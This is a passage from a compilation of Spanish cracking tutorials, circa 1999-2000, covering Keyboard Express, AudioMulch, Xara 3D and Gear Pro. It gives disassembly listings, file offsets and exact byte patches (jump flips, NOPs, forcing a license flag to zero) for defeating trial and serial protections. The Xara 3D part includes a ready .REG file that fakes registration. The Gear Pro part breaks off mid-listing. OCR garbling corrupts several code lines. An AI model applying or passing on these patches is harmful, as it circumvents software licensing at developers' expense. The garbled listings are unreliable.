si no es igual). Según esto, se produciría el salto (que es lo que nos interesa) si el 
resultado de la comparación NO fuese cero, que es lo que sucede ahora que no 
somos usuarios registrados. 

2. Modificar el valor del segundo parámetro de la comparación, de manera que sea 01 


en lugar de 00, que es otro valor que se usa mucho en estos casos. Siendo así, se 
compararía lo que hay en [00479CB4] (que muy probablemente sea 1) con 1 y, de 
ser cierta la hipótesis, se produciría el salto porque 1 menos 1 es 0, y se activaría la 
zero flag, que es la condición para que el salto se produzca. 


Lo típico es cambiar el tipo de salto (poner un "jne" en lugar del "je"), pero probaremos 
ambas soluciones porque así tendrás más experiencia con el manejo de la siguiente 
herramienta que usaremos: el editor hexadecimal. 


Antes de abandonar W32Dasm, sitúate en la línea donde está el salto, de modo que quede 
resaltada en verde. En la barra inferior de la ventana principal aparecerá, hacia el final, lo 
siguiente: Offset 0O04C278h in File: Keyexp.w32. Hay que apuntar el número, 
omitiendo la h final, porque es lo que necesitarás para efectuar los cambios. 4C278 es el 
offset de la instrucción. Ahora haz lo mismo con la otra instrucción. Su offset es 40271. Al 
situarnos en la línea esta vez el color es azul porque no se trata de un salto. 


No hace falta que cierres W32Dasm, basta con minimizar su ventana. Si, no obstante, 
prefieres cerrarlo, primero guárdalo con la opción "Save Disassembly Text File and Create 
Project" del menú "Disassembler". Cuando vuelvas a usar W32Dasm, abres el proyecto 
desde el menú "Project/Open Project File" . De este modo se evita el tiempo de espera 
necesario para desensamblar el archivo. 


FASE 5 


Bien , ahora vamos a trabajar con un editor hexadecimal. Antes de nada, haz otra copia del 
ejecutable (keyexp.exe), cámbiale la extensión (llámalo keyexp.exx, por ejemplo) y 
guárdala en otro directorio; necesitarás copias de este keyexp.exx cada vez que 
compruebes los resultados de los cambios efectuados con el editor hexadecimal. Ahora 
pega una copia del ejecutable que has renombrado (keyexp.exx), en el directorio de 
Keyboard Express y ábrela con tu editor hexadecimal. 


El que yo uso es Hacker”s View (más conocido por HIEW ). Puedes obtenerlo en la 
sección "Utils" en http://protools.hpage.net/ . Para abrir rápidamente los archivos con 
HIEW puedes colocar un acceso directo a él en el escritorio y arrastrar el icono del 
programa que vayas a modificar. 


Las explicaciones que siguen son, por tanto, para los que uséis HIEW. 


Abre con HIEW la copia de keyexp.exx que acabas de colocar en el directorio de nuestra 
víctima. Pulsa dos veces "enter" para pasar a modo "Decode" y ver el código. Ahora pulsa 
FS para introducir el offset. Enter. Apareces en la línea del salto. Pulsa F3 para pasar a 
Modo Edición. Aparecerá un cursor intermitente amarillo. Ya puedes cambiar el byte. 


Teclea 75 para sustituir el original 74 (estos números son los codigos operacionales - 
opcode- de las instrucciones je y jne, respectivamente). Una vez efectuado el cambio pulsa 
F9 para guardar los cambios y F10 para salir. 


Vete al directorio de Keyboard Express y haz doble click sobre archivo que acabas de 
editar (keyexp.exx). Si la aplicación se inicia minimizada en la barra de tareas, al activarla 
vuelve a salir el mensaje de que el periodo de evaluación ha terminado y la nag final. En el 
menu "Help/About" ahora se lee "Fully Licensed Versión" pero al cerrar el programa 
vuelve a aparecer la pantalla recordatoria. Todo esto significa que lo único que hemos 
conseguido es que aparezca otro texto en el "About", pero el programa sigue funcionando a 
los demás efectos como una copia no registrada. 


Borra el fichero que has modificado (keyexp.exx) y sustituyelo por otra copia del que has 
guardado ( y no por él, porque vas necesitar otras copias del keyexp.exx). 


Si quieres seguir practicando con el manejo de HIEW, puedes modificar el código 
de la instrucción de comparación (cmp byte ptr [00479CB4], 00).Los resultados 
serán los mismos del primer intento, por las mismas razones, que ahora se 
comentarán. Para hacer este otro cambio, hay que repetir los pasos anteriores, 
pero introduciendo el offset correspondiente a la línea de la instrucción de 
comparación. Cuando estés en ese punto del código, hay que desplazar el cursor 
hacia la derecha hasta dejarlo debajo del último cero de la secuencia 
803DB49C470000 y sustituirlo por un 1. F9 para guardar y F10 para salir. No 
olvides borrar este otro Keyexp.exx al terminar. 


FASE 6 


Es bastante habitual que estos programas de shareware ejecuten rutinas de comprobación 
en diferentes momentos para determinar si la copia está correctamente registrada, o sigue 
funcionando como copia de evaluación, con las limitaciones temporales o funcionales (en 
otros casos) que esto implica. 


Al cambiar el sentido del salto o el dato a comparar, nosotros hemos conseguido engañar al 
programa en uno de los puntos de comprobación. Cuando hemos ido a cerrar el programa, 
es obvio que se ha producido otra comprobación, que revela al programa nuestra condición 
de no-registrados. Este programa, al parecer, no realiza muchas de estas comprobaciones, 
ni causa muchas molestias mostrando pantallas, pero los hay que son un auténtico 
machaque. En esos casos y, en general, en todos, lo que interesa es detectar la rutina de 
comprobación y modificarla para que cuando se ejecute en diversos momentos, el 
programa asuma siempre que somos usuarios "legales". Por tanto, nos espera una doble 
tarea: detectar y modificar la rutina de comprobación. 


Ahora tenemos que volver al W32Dasm. Cuando tengamos el listado en pantalla, de nuevo 
hay que buscar la cadena "Fully Licensed Version” (como se explica más arriba). 
Retrocede un poco hasta situarte sobre la instrucción de la comparación que comentamos 
antes. 


:0044CE71 803DB49C470001 cmp byte ptr [00479CB4], 00 

Fíjate en la dirección donde se guarda el primer dato (parámetro) de la comparación: 
[00479CB4]. Vamos a comprobar si esa dirección se utiliza únicamente una vez para 
guardar el valor de este primer parámetro, o si se usa para lo mismo en otros puntos del 


código. 


En el menú "Search" teclea la secuencia 479CB4. Antes de pulsar en "Buscar siguiente" 
colócate al comienzo del listado, de modo que se pueda leer la primera línea (Disassembly 
of File: Keyexp.w32). Se puede usar para ello la barra de desplazamiento que hay en la 
parte derecha de la ventana del W32Dasm . 


La primera vez que aparece nuestra secuencia es en 
:00448DFE C605B49C470000 mov byte ptr [00479CB4], 00 


Muy interesante... En esta instrucción el programa coloca un cero en esa dirección de 
memoria. El mismo valor que aparece en "nuestra" comparación. Bien, pero seguimos 
buscando ocurrencias de la cadena 00479CB4 (Los dos ceros de la izquierda se pueden 
omitir) Pulsa F3 o "Buscar siguiente" para ir a otros puntos. 

Van apareciendo, por este orden, todas estas otras ocurrencias: 

:004492DA A2B49C4700 mov byte ptr [00479CB4], al 


:004492E6 803DB49C470000 cmp byte ptr [00479CB4], 00 


:004492ED 745F je 0044934E 


POrrrrrr rr rr rrrrorsrrrrscrrrsrsrrssrrnnnnrnsrnrnnnnnrnnrnnnnnnrnrnnnnnrnnnnncnnnnsn.s.o 


PAULO rr rr rr rro rrrrrrrrorrrrrrrrrrrrrnnrrnncrncnnnnnrncnnnnnnnnnnnnnnrnnnnnnnrncnsn..oo 


:0044C9B1 C605B49C470000 mov byte ptr [00479CB4], 00 
En estas dos últimas, se ha colocado un cero en la variable direccionada en 479CB4 
Luego, aparece nuestra pareja de conocidos 

:0044CE71 803DB49C470001 cmp byte ptr [00479CB4], 00 

:0044CE78 7412 je 0044CE8C 

:0044D043 803DB49C470000 cmp byte ptr [00479CB4], 00 

:0044D04A 7453 je 0044D09F 

:0045ED90 803DB49C470000 cmp byte ptr [00479CB4], 00 


:0045ED97 7429 je 0045EDC2 


Fíjate en esta última; es análoga a la que hemos comentado. Esta vez, si no se ejecuta el 
salto el programa sigue hasta el fragmento de código que hace aparecer el mensaje 


"Evaluation Period for Keyboard Express has expired. Macros will no longer function." 


Es casi seguro que alterar el código aquí tan solo haga no aparecer el mensaje, sin registrar 
completamente el programa. 


er rroosrrsscscnro.. 


:00466939 803DB49C470000 cmp byte ptr [00479CB4], 00 


:00466940 7415 je 00466957 


POrrrrrr rr rrrrrrrrrrrrrscrrsrnrrscrrrnrrnrnnnnncnnnnannnnnnnnnnnnnnnrnnnnnnnnnnsns.o 


:00467CBE C605B49C470000 mov byte ptr [00479CB4], 00 


:00467CC5 EB10 ¡mp 00467CD7 
: 
AA A AA AAA AAA AAA AAA AAA AAA AA 


:00467CD7 803DB49C470000 cmp byte ptr [00479CB4], 00 


:00467CDE 7511 ¡ne 00467CFl1 
: 
SN 


:00468B9A 803DB49C470000 cmp byte ptr [00479CB4], 00 
:00468BA 1 7407 je 00468BAA 


Bueno, ¿qué podemos sacar en claro de todo esto? En siete ocasiones se produce una 
comparación y luego hay un salto. En todas ellas el segundo parámetro de la comparación 
es un 0. 


En otras 4 ocasiones se coloca, mediante una instrucción "mov", un cero en la dirección de 
memoria que nos ocupa. Finalmente, en una de las ocasiones se coloca el contenido del 
registro "al" en esa dirección. Esta es la única vez en que se podría colocar algo variable en 
la posición de memoria que el programa usa para efectuar sus comprobaciones. Tal vez se 
trate del resultado de la rutina que verifica si somos usuarios legales. En otras palabras, al 
iniciarse el programa y/o en otros momentos se hacen las comprobaciones pertinentes para 
determinar si estamos correctamente registrados y, si es así, se pasa un valor al registro 
AL. De ahí, mediante la línea 


:004492DA A2B49C4700 mov byte ptr [00479CB4], al 


el valor pasado queda depositado en la dirección [00479CB4]. Luego, cada vez que el 
programa tiene que optar entre su funcionamiento normal o restrictivo, mira en esa 
dirección y toma uno u otro camino. De todo lo anterior podemos suponer que si hubiese 
un 0 ahí, el programa actuaría como si fuésemos usuarios registrados. Vamos a dar unos 
retoques al código para comprobarlo. Esta vez vamos a modificar la instrucción 
inmediatamente anterior. Para ir a esa localización, En "Goto/Goto Code Location" se 
introduce la dirección de esa instrucción (4492D8) 


:004492D8 3401 xor al, 01 fl situado aquí, anota el 


offset 


:004492DA A2B49C4700 mov byte ptr [00479CB4], al 


AAA 


FASE 7 


Vuelve al editor hexadecimal (coloca otra copia de keyexp.exx ). Procede como antes 
para editar la línea. Una vez en ese punto, y cuando ya está el cursor amarillo parpadeando, 
pulsa enter. Se abrirá la ventana "Assembler" . Sitúa el cursor todo a la izquierda, debajo 
de la letra x y tecleamos "mov" (sin las comillas). Seguidamente te desplazas hasta el otro 
extremo, y en lugar del 1 teclea O. La instrucción debe quedar así en la ventana: 


mov al, 000 
Enter y Esc. F9 y FLO. Listo. 


Lanza el programa (haz doble click sobre archivo keyexp.exx que acabas de editar) y 
ciérralo. Ya no sale la pantalla de recordatorio. En el menú Help/About aparece "Fully 
Licensed Version”. Si modificas la clave del registro retrocediendo suficientemente la 
fecha, sigue sin suceder nada. El programa cree en todo momento que eres un usuario 
registrado. Para seguir evaluando esta aplicación sin las molestias anteriores, ahora sería el 
momento de borrar el archivo keyexp.exe y restaurar la extensión .exe a este último 
keyexp.exx modificado con éxito. 


Los cambios que has introducido consisten en modificar la instrucción para que pase un 
cero al registro AL. En la siguiente instrucción, se pasa el contenido de AL a la dirección 
00479CB4 . Ahora ya tendrás siempre un cero ahí, con lo que todas las comprobaciones 
harán que los saltos se produzcan y harán pasar por alto todas las restricciones y mensajes 
del programa. Por mucho que las comprobaciones acerca de nuestra condición de "legal" 
no sean satisfactorias, hemos obligado al programa a dar siempre el OK. 


Alguien se preguntará si no hubiera sido más fácil modificar la línea 
:004492DA A2B49C4700 mov byte ptr [00479CB4], al 
convirtiéndola en 


:004492DA C605B49C470000 mov byte ptr [00479CB4], 00 


Bien, resulta que para reensamblar la segunda instrucción se necesitan dos bytes más en el 
opcode (A2B49C4700), con lo que se trastoca todo el código que va a continuación. 


TERMINANDO 


Esto ha sido todo. Espero que os haya servido de algo. Ya sé que me ha salido un ladrillo 
de tutorial, pero repito lo dicho al principio: prefiero eso, a dar por supuestas cosas que, tal 
vez, no lo sean. 


Gracias a todos los que han decidido compartir sus conocimientos en La Red, para que 
otros podamos aprender. Yo al menos, les debo todo lo que he ido aprendiendo. 


Especial agradecimiento a Karpoff por sus consejos para elaborar este tutorial y alojarlo en 
su web. 


Saludos y a seguir progresando. 
Noviembre del 99 


f frantic hotmail.com 


Karpoff Spanis 
Tutorial Descargado de o 


TUTORIAL BY: ZZ-TOP 
21/1/2000 


Programa : AudioMulch 0.8b4 
Característica: shareware 


Limitación: 30 días 


Introducción 


Antes que nada, saludos para toda la familia del cracking hispano (tanto 
que hacer y tan poco tiempo) ;-) 

Como ya habrás leído, hoy veremos el “AudioMulch 0.8b4”, este 
programa es un sintetizador modular de características notables, 
aquellos que lo deseen, pueden descargarlo de la página del autor en 
http://www.audiomulch.com la versión es totalmente funcional, 
existiendo la posibilidad de registrarce. 

La única limitación es que a los 30 días de uso el programa expira. 


Herramientas 


Wdasm32 
Editor hexadecimal (el que gustes, yo utilizo Hex Workshop) 


Bueno, lo primero que hay que hacer, es expirar el programa, o sea, 
adelanta la fecha de tu ordenador dos meses (asegúrate de que ningún 
programa se esté ejecutando cuando haces esto). 

Luego al intentar ejecutar el programa nos encontramos con un cartel 
que nos avisa que el programa ha expirado ( la verdad no he tenido 
tiempo suficiente de evaluarlo aún ¿ que tal unos días mas? :-pb 
Observa con atención ese cartel (si lo crees necesario, toma nota) 


Ahora vamos al Wdasm32 y desensamblamos el ejecutable Mulch.exe, 
cuando haya terminado el proceso 
Buscaremos en las cadenas de texto la frase ( o parte de ella) que vimos 
anteriormente en el cartel. 

Si es la primera vez que utilizas el Wdasm32 te diré que para ver dichas 
cadenas, debes pulsar en el menú REFS y seleccionar String data 
references ( o su correspondiente botón). Hecho esto, se abrirá una 
nueva ventana con todas las cadenas de texto que aparecen en el 
programa, Es muy aconsejable revisarlas todas con detenimiento, 
aunque en este caso nos interesa una en particular: 

“this versión of AudioMulch has” como podrás ver, coincide plenamente 
con el cartel, solo que está incompleta, hacemos doble clic sobre la frase 
y nos sitúa el la parte del código correspondiente. 

Fíjate la barra de estado del Wdasm32, se a llenado con datos que nos 
informan sobre qué número de línea estamos, que número de código de 
datos y el offset, más adelante esto será de mucha utilidad. 

Fíjate que aparecemos en el código de datos número :00430C20 en la 
primer instrucción del mensaje maldito, pero ¿, que instrucciones se 
ejecutan antes del mensaje? 


Mas arriba tenemos... 


Reference to KERNL32 GetSystemTime 
00430BEC E8FD321500 Call 00583EEE 
00430BF1  66813C24D007 cmp WORD PTR [ESP], 07D0 


00430BF7 7720 ja 00430C19 >>>>>>>salta al mensaje de 
expirado 

00430BF9 66813C24D007 cmp WORD PYTR [esp], 07D0 

00430BFF 7533 jne 00430C34>>>>>>>el programa continúa 


su ejecución 
(instrucciones codificadas en hexadecimal) 


Como podrás ver se hace referencia al API mediante 
KERNEL 32GetSystemTime y en :00430BF7 hay un Salto condicional 


que nos conduce a 00430C109 es decir, una instrucción antes que el 
mensaje. 

Luego en 00430BFF tenemos otro salto condicional que de ejecutarse 
nos llevaría a 00430C34 y el programa continuaría su ejecución. 


Analicemos, primero se hace una llamada, luego, una comparación, y del 
resultado de esta comparación Se determina si el salto se ejecuta o no ( 
nosotros sabemos que este salto ha de ejecutarse ya que hemos expirado 
el programa) 

Si este salto no se ejecuta, se vuelve a comparar y nuevamente el 
resultado determina si se ejecuta el siguiente salto ( lo que nos permitiría 
seguir utilizando el programa ) pero sabemos que dadas las condiciones 
numéricas no estamos favorecidos, por esta razón haremos dos pequeños 
cambios 


Necesitamos entonces: >>>que el primer salto no se ejecute<<< 
>>>que el segundo salto se ejecute si o si<<< 


Colócate sobre 00430BF7 (o sea el primer salto que vamos a modificar) 
fíjate la barra de estado donde dice offset, encontrarás este número 
301F”7 (anota o recuerda) 

Ahora carga el ejecutable en tu editor hexadecimal, (aquellos que usen 
hex workshop en el menú edit Encontrarán la opción goto, los que no, 
busquen su equivalente ) introduce la dirección de offset:301F7 

Y Go, aparecemos justo donde queremos 7720 es el primer salto, y 
nosotros no queremos que se ejecute 

Entonces lo cambiamos por 9090 ( 90 es la codificación en hexa de la 
instrucción NOP, o sea no hacer nada) si miras con atención en el 
Wdasm32 entre el código de datos y las instrucciones en ASM, verás 
Que hay unos números, no son ni más ni menos que las instrucciones en 
hexadecimal. 

Fíjate que el siguiente salto está separado sólo por una instrucción, es 
decir que luego de 

66813C24D007 (que es la comparación en hexa) viene 7533 (el salto que 
queremos que se ejecute) nos ubicamos en el 75 y lo cambiamos por EB 
(la codificación en hexa para JMP o sea salto incondicional) 


0066 813C 24D0 0790 9066 813C 24D0 07EB 
3366 837C 2402 0377 1066 837C 2402 
0375 


así debe verse con los cambios realizados. 

Solamente resta guardar el ejecutable con un nuevo nombre, por 
ejemplo Mulch2.exe en el mismo directorio donde está el programa, y 
evalúalo todo lo que quieras. 


Recomendaciones : 


Familiarízate con las herramientas, cuanto mejor las domines mas fácil 
te será todo. 

Se paciente, muchas veces las cosas no son tan fáciles como en este 
ejemplo, lee a los maestros 

En lo posible, familiarízate con el ASM, lee a los maestros. 

Espero que haya sido de ayuda a quienes se están iniciando en la 
ingeniería inversa, muchas gracias Amigo karpoff por alojarme en tu 
casa ( y vuestros sabios consejos) 


1/1 -TOP 


Xara 3D v.2.11 por *DeeJay? 


Proteccion: Caduca a los 15 dias si no introduces el serial 
URL: http://www.xara.com/xara3d/ 


Herramientas: W32Dasm +Hworks32 


Introducción 


Se trata de un programilla muy pequeño, que crea teztos en 3D, muy facilon, y vastante 
util a aquellos que diseñen páginas web. 


Tiene una protección pesima, y en 1 minutillo si llegas conseguireis registraros. 


Al AtaKe 

OK, poneros el casco que arrancamos.... 

Bien ejecutamos el progrma, nos aparece una bonita Nag, qeu nos dice que solo tenemos 
15 dias, y un par de botones, PURCHASE, ¿¿¿2???, que sera esto, bien, pondamos DeeJay, 
por ejemplo... 

Miiigggggg, error..... You entered an invalid unlock code. The program has not been. 
Bueno pues ya tenemos por donde empezar.... 


Abrimos W32Dasm, y buscamos por ejemplo you entered 


y aparecemos en: 


* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 
[:0040C3A9(C), :0040C3BD(C), :0040C3D9(C), :0040C3F5(C), :0040C411(C) 
[:0040C42D(C), :0040C449(C), :0040C465(C), :0040C4DC(C) 


* Possible Reference to Dialog: DialoglID_00A7, CONTROL_ID:00FF, "" 

| 

:0040C595 GAFF push FEFFFFFF 

:0040C597 6A10 push 00000010 

* Possible Reference to String Resource ID=03005: "You entered an invalid unlock code. 
The program has not been" 

| 

:0040C599 68BDO0B0000 push 00000BBD 


:0040C59E E8S8C8E0600 call 0047542F 


Pufff, cuantas condiciones, bueno pero no se llevan mucho unas de otras vamos aver, 
pulsamos SHIFT+F12 en el w32dasm, y buscamos por ejemplo la condición 0040C3A09, 
llegamos a... 


Joder, cuantas jejej epro todas juntas, sera un traabajito, facil pero aburrido... 


:0040C3A9 0F85E6010000 ¡ne 0040C595 


:0040C3AF OFBE10 movsx edx, byte ptr [eax] 


:0040C3B2 52 push edx 

:0040C3B3 ES08530400 call 004516C0 

:0040C3B8 83C404 add esp, 00000004 

:0040C3BB 85C0 test eax, eax 

:0040C3BD 0F84D2010000 je 0040C595 

:0040C3C3 8B 842440010000 mov eax, dword ptr [esp+00000140] 
:0040C3CA OFBE4801 movsx ecx, byte ptr [eax+01] 
:0040C3CE 51 push ecx 

:0040C3CF E8EC520400 call 004516C0 

:0040C3D4 83C404 add esp, 00000004 

:0040C3D7 85C0 test eax, eax 

:0040C3D9 0F84B6010000 je 0040C595 

:0040C3DF 8B942440010000 mov edx, dword ptr [esp+00000140] 
:0040C3E6 0FBE4202 movsx eax, byte ptr [edx+02] 
:0040C3EA 50 push eax 

:0040C3EB E8DO0520400 call 004516C0 

:0040C3F0 83C404 add esp, 00000004 

:0040C3F3 85C0 test eax, eax 

:0040C3F5 0F849A010000 je 0040C5395 


:0040C3FB 8B8C2440010000 mov ecx, dword ptr [esp+00000140] 


:0040C402 OFBE5103 movsx edx, byte ptr [ecx+03] 
:0040C406 52 push edx 

:0040C407 E8B4520400 call 004516C0 

:0040C40C 83C404 add esp, 00000004 

:0040C40F 85C0 test eax, eax 

:0040C411 0F847E010000 je 0040C595 

:0040C417 8B 842440010000 mov eax, dword ptr [esp+00000140] 
:0040C41E 0FBE4804 movsx ecx, byte ptr [eax+04] 
:0040C422 51 push ecx 

:0040C423 E898520400 call 004516C0 

:0040C428 83C404 add esp, 00000004 

:0040C42B 85C0 test eax, eax 

:0040C42D 0F8462010000 je 0040C595 

:0040C433 8B942440010000 mov edx, dword ptr [esp+00000140] 
:0040C43A 0FBE4205 movsx eax, byte ptr [edx+05] 
:0040C43E 50 push eax 

:0040C43F E87C520400 call 004516C0 

:0040C444 83C404 add esp, 00000004 

:0040C447 85C0 test eax, eax 


:0040C449 0F8446010000 je 0040C595 


:0040C44F 8B8C2440010000 mov ecx, dword ptr [esp+00000140] 
:0040C456 OFBE5106 movsx edx, byte ptr [ecx+06] 
:0040C45A 52 push edx 

:0040C45B ES60520400 call 004516C0 

:0040C460 83C404 add esp, 00000004 

:0040C463 85C0 test eax, eax 

:0040C465 0F842A010000 je 0040C595 

:0040C46B 8B842440010000 mov eax, dword ptr [esp+00000140] 
:0040C472 0FBE4804 movsx ecx, byte ptr [eax+04] 
:0040C476 OFBE5006 movsx edx, byte ptr [eax+06] 
:0040C47A 8D0C49 lea ecx, dword ptr [ecx+2*ecx] 
:0040C47D 8DOCCA lea ecx, dword ptr [edx+8*ecx] 
:0040C480 OFBE5002 movsx edx, byte ptr [eax+02] 
:0040C484 8DOC49 lea ecx, dword ptr [ecx+2*ecx] 
:0040C487 8DOCCA lea ecx, dword ptr [edx+8*ecx] 
:0040C48A OFBE5S005 movsx edx, byte ptr [eax+05] 
:0040C48E 8D0C49 lea ecx, dword ptr [ecx+2*ecx] 
:0040C491 8DOCCA lea ecx, dword ptr [edx+8*ecx] 
:0040C494 OFBE10 movsx edx, byte ptr [eax] 


:0040C497 8DOC49 lea ecx, dword ptr [ecx+2*ecx] 


:0040C49A 8DOCCA lea ecx, dword ptr [edx+8*ecx] 
:0040C49D OFBE5001 movsx edx, byte ptr [eax+01] 
:0040C4A1 8D0C49 lea ecx, dword ptr [ecx+2*ecx] 
:0040C4A4 8DOCCA lea ecx, dword ptr [edx+8*ecx] 
:0040C4A7 OFBE5003 movsx edx, byte ptr [eax+03] 
:0040C4AB 8D0C49 lea ecx, dword ptr [ecx+2*ecx] 
:0040C4AE 8BC5 mov eax, ebp 

:0040C4BO 2555555355 and eax, 55555355 

:0040C4B5 8D94CA67216BFB lea edx, dword ptr [edx+8*ecx-494DE99] 
:0040C4BC 8BCD mov ecx, ebp 

:0040C4BE D1E9 shr ecx, 1 

:0040C4C0 81E155555555 and ecx, 55555355 
:0040C4C6 8DOC41 lea ecx, dword ptr [ecx+2*eax] 
:0040C4C9 8D0489 lea eax, dword ptr [ecx+4*ecx] 
:0040C4CC C1E008 shl eax, 08 

:0040C4CF 2BC1 sub eax, ecx 

:0040C4D1 8D04C0 lea eax, dword ptr [eax+8*eax] 
:0040C4D4 8D0441 lea eax, dword ptr [ecx+2*eax] 
:0040C4D7 8DOC40 lea ecx, dword ptr [eax+2*eax] 


:0040C4DA 3BD1 cmp edx, ecx 


:0040C4DC 0F85B3000000 ¡ne 0040C595 
:0040C4E2 8B0D10EC4B00 mov ecx, dword ptr [004BEC10] 


:0040C4E8 55 push ebp 


* Possible StringData Ref from Data Obj] ->"Key" 


:0040C4E9 6828744A00 push 004A7428 


* Possible StringData Ref from Data Ob] ->"Install" 


| :0040C4EE 6820744A00 push 00447420 

:0040C4F3 ESAFA20600 call 004767A7 

:0040C4F8 C605D0E44B0000 mov byte ptr [004BE4D0], 00 
:0040C4FF 8D8C2444010000 lea ecx, dword ptr [esp+00000144] 
:0040C506 C68424B40400000B mov byte ptr [esp+000004B4], 0B 
:0040C50E E845140600 call 0046D958 

:0040C513 8D8C2440010000 lea ecx, dword ptr [esp+00000140] 
:0040C51A C68424B40400000A4 mov byte ptr [esp+000004B4], DA 
:0040C522 E831140600 call 0046D958 


:0040C527 8D8C2404010000 lea ecx, dword ptr [esp+00000104] 


:0040C52E C68424B404000009 mov byte ptr [esp+000004B4], 09 
:0040C536 ESABF30600 call 0047B8E6 

:0040C53B 8D8C24A8000000 lea ecx, dword ptr [esp+000000A8] 
:0040C542 C68424B404000003 mov byte ptr [esp+000004B4], 03 
:0040C54A E8C7010600 call 0046C716 

:0040C54F 8D4C2438 lea ecx, dword ptr [esp+58] 

:0040C553 C68424B404000002 mov byte ptr [esp+000004B4], 02 
:0040C55B ESE0620500 call 00462840 

:0040C560 8D4C2458 lea ecx, dword ptr [esp+58] 

:0040C564 E887630500 call 004628F0 

:0040C569 8D4C241C lea ecx, dword ptr [esp+1C] 
:0040C56D C68424B404000000 mov byte ptr [esp+000004B4], 00 
:0040C575 ESDE130600 call 0046D958 

:0040C57A 8D4C2414 lea ecx, dword ptr [esp+14] 


:0040C57E C78424B4040000FFFFFFFF mov dword ptr [esp+000004B4], FFFFFFFF 


:0040C589 E8SCA 130600 call 0046D958 
:0040C58E B001 mov al, 01 
:0040C590 E9AA000000 jmp 0040C63F 


Bueno en vista de esto no tenemos mas que sustituir todas las condiciones a si que te pones 
encima de la primera y te fijas en la parte de abajo del W32Dasm te da el offset, vas al 


Editor y buscas el offset llegaras a.. 


0F85E6010000 sustille OF85 por OF84 osea JNE por JE 


y asi con todos los que hagas referenca a 0040C595... 


:0040C3BD 0F34D2010000 je 0040C595 sustituir OF84 por OF85 


osea JE por JNE 


Bueno y asi con todas las referencias, teneis que tener cuidado con la linea 


:0040C4DC 0F385B3000000 jne 0040C595 


ya que como esta mas abajo puede que os la paseis de largo.... 
Una vez hecho esto podeis introducir cualquier texto, menos el original y os registrara.. 
VaMoS MaS aLLa 


El ansia de aprender me hace investigar, aunque tambien es curiosisdad, que que ha sido 
tan fasil que me gustaria saber que hace 


ejecutamos el programa y vemos que funciona correctamente, pero ¿ que ha hecho al 
marcar el codigo ? 


Bien ejecutamos el REGEDIT y buscamos nuestro serial... sorpresaaaa, no aparece, 


ummmm jejejejej. 


busquemos, Sara... 


Bingoooo... HKEY_CURRENT_USERWSoftwarelXaralX3D2Unstall 


nos ha creador un valor DWORD con el nombre key que contiene 7cfe352c, Hexadecimal, 
este valor te lo pone cuando acepta el passwor, pero no tiene nada que ver con el, ya que 
siempre pone el mismo valor... 


Sí lo quitais vereis que otra vez estais sin registrar, y al registraros lo vuelve a poner...jeje 


para este no hay que hacer ningun parcheador, bastara con hacer un fichero con la 
extension .REG, para que nos incluya esta clave en el registro, asi que creamos un fichero 
que se llame por ejemplo CLAVES3D.REG y escribimos.. 


REGEDIT4 
[HKEY CURRENT_USERNSoftwarelXaraX3D2WVnstall] 


"key"=dword:7cfe352c 


y ya tenemos nuestro registro, fasil no??? 

Bueno que lo disfruteis y recordad que esto es unicamente para el estudio de protecciones, 
no seais lamer, y no comercialiceis que luego nos llaman piratas, y yo no soy ningun 
pirata, solo estudio y aprendo, para superar los defectos de los programas, no hago guerras 
como otros. 

Yo no gano dinero con esto, gano sabiduria, haz lo mismo, se sabio.... 


A ver si los peces gordos nos dejan en paz, que mas les valdria aprender que destrozar.... 


Este es mi legado.... “DeeJay? 


Que lo disfruteis 


Gear Pro V4.41 Trial 


Proteccion: Shareware 30 dias, Nag 
Descripcion Grabador de CDs 
Herramientas: Win32Dasm8.93 

Cracker: *DeeJay”* 26/03/2000 


INTRODUCCION 


Estando una tarde con un amiguete, nos 
decidimos a copiar unos jJueguecillos de la 
play, cual era mi sorpresa cuando veo que mi 
new grabadora 8424, al ser muy new no tiene 
ningun software bueno para grabar estos 
Jjueuecillos, asi que me decido por hacer 
pruebas, y este copia correctamente. 

Despues de Y copias, me decido, ¡¡ es el 
programa que buscaba ¡¡ 

Una versión trial, ummmm, bueno de la web que 
lo baje ya viene con el crack, me ahorro el 
trabasillosw<: 

pero mierda, ¿ quien habra sido el chapuza que 
ha hecho este crack que no funciona, si no que 
jode el ejecutable?, tras esto me decido a 
crackearlo, tiene proteccion con limite de 
tiempo, y una nag muy linda que nos informa de 
cuando dejaremos de usar el programa, (y eso 
va y se lo cree). 


AL ATAKERRRRRRR 


Primer contacto: 
Bien para empezar Cambiaremos la fecha de 
nuestra maquina, y ejecutaremos el programa, 


vemos que ¡¡¡P1Ppppi¡¡¡, se te ha acabado el 
tiempo chavalin. 
Bueno... leamos qe nos pone exactamente... 


Your Trial version has expired. 

ok, abrimos el W32Dasm, y cargamos el 
ejecutable GEAR.EXE, despues buscamos la 
cadena Your Trial version has expired 

nos va a localizar dos: 

* Referenced by a (U)nconditional or 
(C)onditional Jump at Addresses: 
¡[FODATELET (CH TODATCSOD (0) 

| 

:0041C396 8B45F0 mov eax, dword ptr [ebp-10] 
:0041C399 50 push eax 

* Reference To: gear._pp valdate(f4 

| 

:0041C39A E824CD0100 call 004390C3 

:0041C39F 85C0 test eax, eax 

:0041C3A1 753A 3jne 0041C3DD 

:0041C3A3 8B4DFO mov ecx, dword ptr [ebp-10] 
:0041C3A6 51 push ecx 

* Reference To: gear. _pp_ lfclosek4 

| 

:0041C3A7 E800CDO100 call 004390AC 

:0041C3AC 6810200000 push 00002010 

:0041C3B1 8B9578FEFFFF mov edx, dword ptr 
[ebp+FFFFFE78] 

:0041C3B7 8B4278 mov eax, dword ptr [edx+78] 
:0041C3BA 50 push eax 


* Possible StringData Ref from Data Ob3j -—"Your 
Trial version has expired!" 


:0041C3BB 68ECED4700 push 0047EDEC 
:0041C3C0 6A00 push 00000000 
* Reference To: USER32.MessageBoxA, Ord:01BEh 


Y. La «Otra: 

* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 

|:0041C3A1 (C) 

| 

:0041C3DD 8B4DF0O mov ecx, dword ptr [ebp-10] 
:0041C3E0 51 push ecx 

* Reference To: gear._pp expired 4 

| 

:0041C3E1 E880CBO0100 call 00438F66 

:0041C3E6 85C0 test eax, eax 

:0041C3E8 7445 Je 0041C42F 

:0041C3EA 6A00 push 00000000 

:0041C3EC 8B55F0 mov edx, dword ptr [ebp-10] 
:0041C3EF 52 push edx 

* Reference To: gear._pp_upddate(b8 

| 

:0041C3F0 E8E5CDO100 call 004391DA 

:0041C3F5 8B45F0 mov eax, dword ptr [ebp-10] 
:0041C3F8 50 push eax 

* Reference To: gear. _pp_lfclosef4 

| 

:0041C3F9 E8AECCO100 call 004390AC 

:0041C3FE 6810200000 push 00002010 

